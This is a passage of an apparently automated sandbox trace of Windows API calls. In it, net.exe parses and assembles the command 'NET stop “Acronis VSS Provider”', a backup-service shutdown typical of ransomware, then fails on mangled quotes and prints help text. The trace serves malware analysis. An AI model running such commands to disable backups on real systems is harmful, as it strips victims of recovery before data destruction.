REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0218.176] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.176] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0218.176] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.176] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0218.177] _wcsicmp (_String1="REPL", _String2="ΓÇ£Acronis") returned -833 [0218.177] _wcsicmp (_String1="REPL", _String2="VSS") returned -4 [0218.177] _wcsicmp (_String1="REPL", _String2="ProviderΓÇ¥") returned 2 [0218.177] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0218.177] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.177] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0218.177] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Acronis") returned -833 [0218.177] _wcsicmp (_String1="REPLICATOR", _String2="VSS") returned -4 [0218.177] _wcsicmp (_String1="REPLICATOR", _String2="ProviderΓÇ¥") returned 2 [0218.177] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.177] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0218.177] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.177] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0218.177] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.177] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0218.177] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Acronis") returned -832 [0218.177] _wcsicmp (_String1="SESSIONS", _String2="VSS") returned -3 [0218.177] _wcsicmp (_String1="SESSIONS", _String2="ProviderΓÇ¥") returned 3 [0218.177] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0218.177] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.177] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0218.177] _wcsicmp (_String1="SESS", _String2="ΓÇ£Acronis") returned -832 [0218.177] _wcsicmp (_String1="SESS", _String2="VSS") returned -3 [0218.177] _wcsicmp (_String1="SESS", _String2="ProviderΓÇ¥") returned 3 [0218.177] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.177] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0218.177] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.177] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0218.177] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.177] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0218.177] _wcsicmp (_String1="STATS", _String2="ΓÇ£Acronis") returned -832 [0218.177] _wcsicmp (_String1="STATS", _String2="VSS") returned -3 [0218.177] _wcsicmp (_String1="STATS", _String2="ProviderΓÇ¥") returned 3 [0218.177] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.177] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0218.177] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.177] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0218.178] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.178] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0218.178] _wcsicmp (_String1="USERS", _String2="ΓÇ£Acronis") returned -830 [0218.178] _wcsicmp (_String1="USERS", _String2="VSS") returned -1 [0218.178] _wcsicmp (_String1="USERS", _String2="ProviderΓÇ¥") returned 5 [0218.178] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.178] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0218.178] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.178] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0218.178] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.178] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0218.178] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Acronis") returned -833 [0218.178] _wcsicmp (_String1="REDIRECTOR", _String2="VSS") returned -4 [0218.178] _wcsicmp (_String1="REDIRECTOR", _String2="ProviderΓÇ¥") returned 2 [0218.178] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0218.178] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.178] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0218.178] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Acronis") returned -833 [0218.178] _wcsicmp (_String1="REDIR", _String2="VSS") returned -4 [0218.178] _wcsicmp (_String1="REDIR", _String2="ProviderΓÇ¥") returned 2 [0218.178] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0218.178] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.178] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0218.178] _wcsicmp (_String1="RDR", _String2="ΓÇ£Acronis") returned -833 [0218.178] _wcsicmp (_String1="RDR", _String2="VSS") returned -4 [0218.178] _wcsicmp (_String1="RDR", _String2="ProviderΓÇ¥") returned 2 [0218.178] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0218.178] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.178] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0218.178] _wcsicmp (_String1="WORK", _String2="ΓÇ£Acronis") returned -828 [0218.178] _wcsicmp (_String1="WORK", _String2="VSS") returned 1 [0218.178] _wcsicmp (_String1="WORK", _String2="ProviderΓÇ¥") returned 7 [0218.178] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0218.178] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.178] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0218.178] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Acronis") returned -828 [0218.178] _wcsicmp (_String1="WKSTA", _String2="VSS") returned 1 [0218.179] _wcsicmp (_String1="WKSTA", _String2="ProviderΓÇ¥") returned 7 [0218.179] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0218.179] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.179] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0218.179] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Acronis") returned -835 [0218.179] _wcsicmp (_String1="PRDR", _String2="VSS") returned -6 [0218.179] _wcsicmp (_String1="PRDR", _String2="ProviderΓÇ¥") returned -11 [0218.179] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0218.179] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.179] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0218.179] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Acronis") returned -847 [0218.179] _wcsicmp (_String1="DEVRDR", _String2="VSS") returned -18 [0218.179] _wcsicmp (_String1="DEVRDR", _String2="ProviderΓÇ¥") returned -12 [0218.179] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.179] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0218.179] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.179] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0218.179] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.179] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0218.179] _wcsicmp (_String1="SVR", _String2="ΓÇ£Acronis") returned -832 [0218.179] _wcsicmp (_String1="SVR", _String2="VSS") returned -3 [0218.179] _wcsicmp (_String1="SVR", _String2="ProviderΓÇ¥") returned 3 [0218.179] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0218.179] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.179] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0218.179] _wcsicmp (_String1="SRV", _String2="ΓÇ£Acronis") returned -832 [0218.179] _wcsicmp (_String1="SRV", _String2="VSS") returned -3 [0218.179] _wcsicmp (_String1="SRV", _String2="ProviderΓÇ¥") returned 3 [0218.179] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.179] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x2cf720, nSize=0x0, Arguments=0x2cf71c | out: lpBuffer="嗨Xꔺ瓡") returned 0x1c [0218.179] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0218.179] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0218.179] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0218.179] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0218.179] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.179] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0218.180] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0218.180] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.180] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0218.180] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.180] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0218.180] wcscpy_s (in: _Destination=0x23a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0218.180] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0218.181] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x23b338, nSize=0x800, Arguments=0x239dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0218.181] GetFileType (hFile=0x26c) returned 0x3 [0218.181] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x583c18 [0218.181] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x583c18, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0218.181] WriteFile (in: hFile=0x26c, lpBuffer=0x583c18, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cf700, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf700, lpOverlapped=0x0) returned 0 [0218.181] LocalFree (hMem=0x583c18) returned 0x0 [0218.181] GetFileType (hFile=0x26c) returned 0x3 [0218.181] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x583920 [0218.181] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x583920, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nX", lpUsedDefaultChar=0x0) returned 2 [0218.181] WriteFile (in: hFile=0x26c, lpBuffer=0x583920, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cf700, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cf700, lpOverlapped=0x0) returned 0 [0218.182] LocalFree (hMem=0x583920) returned 0x0 [0218.182] wcscpy_s (in: _Destination=0x2cf7b8, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0218.182] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0218.182] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0218.182] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0218.182] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Acronis", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Acronis") returned 0x0 [0218.182] wcsncat_s (in: _Destination="NET stop ΓÇ£Acronis", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Acronis ") returned 0x0 [0218.182] wcsncat_s (in: _Destination="NET stop ΓÇ£Acronis ", _SizeInWords=0x200, _Source="VSS", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Acronis VSS") returned 0x0 [0218.182] wcsncat_s (in: _Destination="NET stop ΓÇ£Acronis VSS", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Acronis VSS ") returned 0x0 [0218.182] wcsncat_s (in: _Destination="NET stop ΓÇ£Acronis VSS ", _SizeInWords=0x200, _Source="ProviderΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥") returned 0x0 [0218.182] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X댸#,Ѱ#ɬ") returned 0xad [0218.182] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minute", _MaxCount=0x23) returned 18 [0218.182] LocalFree (hMem=0x585630) returned 0x0 [0218.182] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x2e [0218.182] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD ", _MaxCount=0x23) returned 16 [0218.182] LocalFree (hMem=0x585630) returned 0x0 [0218.182] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x7d [0218.182] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT", _MaxCount=0x23) returned 16 [0218.182] LocalFree (hMem=0x585630) returned 0x0 [0218.182] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x26 [0218.182] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r", _MaxCount=0x23) returned 16 [0218.182] LocalFree (hMem=0x585630) returned 0x0 [0218.182] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x19 [0218.182] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x23) returned 16 [0218.182] LocalFree (hMem=0x585630) returned 0x0 [0218.182] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x1b [0218.182] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x23) returned 13 [0218.182] LocalFree (hMem=0x585630) returned 0x0 [0218.182] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xbe [0218.182] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"te", _MaxCount=0x23) returned 12 [0218.182] LocalFree (hMem=0x585630) returned 0x0 [0218.182] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x33 [0218.182] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET c", _MaxCount=0x23) returned 11 [0218.183] LocalFree (hMem=0x585630) returned 0x0 [0218.183] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x19 [0218.183] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x23) returned 11 [0218.183] LocalFree (hMem=0x585630) returned 0x0 [0218.183] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xc1 [0218.183] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMEN", _MaxCount=0x23) returned 7 [0218.183] LocalFree (hMem=0x585630) returned 0x0 [0218.183] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x16 [0218.183] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x23) returned 3 [0218.183] LocalFree (hMem=0x585630) returned 0x0 [0218.183] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x33 [0218.183] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DEL", _MaxCount=0x23) returned 15 [0218.183] LocalFree (hMem=0x585630) returned 0x0 [0218.183] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x234 [0218.183] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET SHARE\r\nsharename\r\n sha", _MaxCount=0x23) returned 12 [0218.183] LocalFree (hMem=0x585630) returned 0x0 [0218.183] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x13 [0218.183] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x23) returned 14 [0218.183] LocalFree (hMem=0x585630) returned 0x0 [0218.183] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x14 [0218.183] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x23) returned 14 [0218.183] LocalFree (hMem=0x585630) returned 0x0 [0218.183] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x14 [0218.184] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x23) returned 14 [0218.184] LocalFree (hMem=0x585630) returned 0x0 [0218.184] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x15 [0218.184] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x23) returned 14 [0218.184] LocalFree (hMem=0x585630) returned 0x0 [0218.184] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x15 [0218.184] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x23) returned 14 [0218.184] LocalFree (hMem=0x585630) returned 0x0 [0218.184] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x16 [0218.184] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x23) returned 14 [0218.184] LocalFree (hMem=0x585630) returned 0x0 [0218.184] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x11 [0218.184] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x23) returned 14 [0218.184] LocalFree (hMem=0x585630) returned 0x0 [0218.184] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x14 [0218.184] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x23) returned 14 [0218.184] LocalFree (hMem=0x585630) returned 0x0 [0218.184] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x12 [0218.184] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x23) returned 14 [0218.184] LocalFree (hMem=0x585630) returned 0x0 [0218.184] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0xf [0218.184] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x23) returned 14 [0218.184] LocalFree (hMem=0x585630) returned 0x0 [0218.184] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x17 [0218.184] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x23) returned 14 [0218.184] LocalFree (hMem=0x585630) returned 0x0 [0218.184] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x18 [0218.184] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x23) returned 14 [0218.184] LocalFree (hMem=0x585630) returned 0x0 [0218.184] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x2a [0218.184] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERV", _MaxCount=0x23) returned 14 [0218.184] LocalFree (hMem=0x585630) returned 0x0 [0218.184] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x15 [0218.184] _wcsnicmp (_String1="NET stop ΓÇ£Acronis VSS ProviderΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x23) returned 19 [0218.184] LocalFree (hMem=0x585630) returned 0x0 [0218.184] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2cf700, nSize=0x0, Arguments=0x2cf6fc | out: lpBuffer="嘰X⡋瓢,嘰X,") returned 0x58 [0218.185] 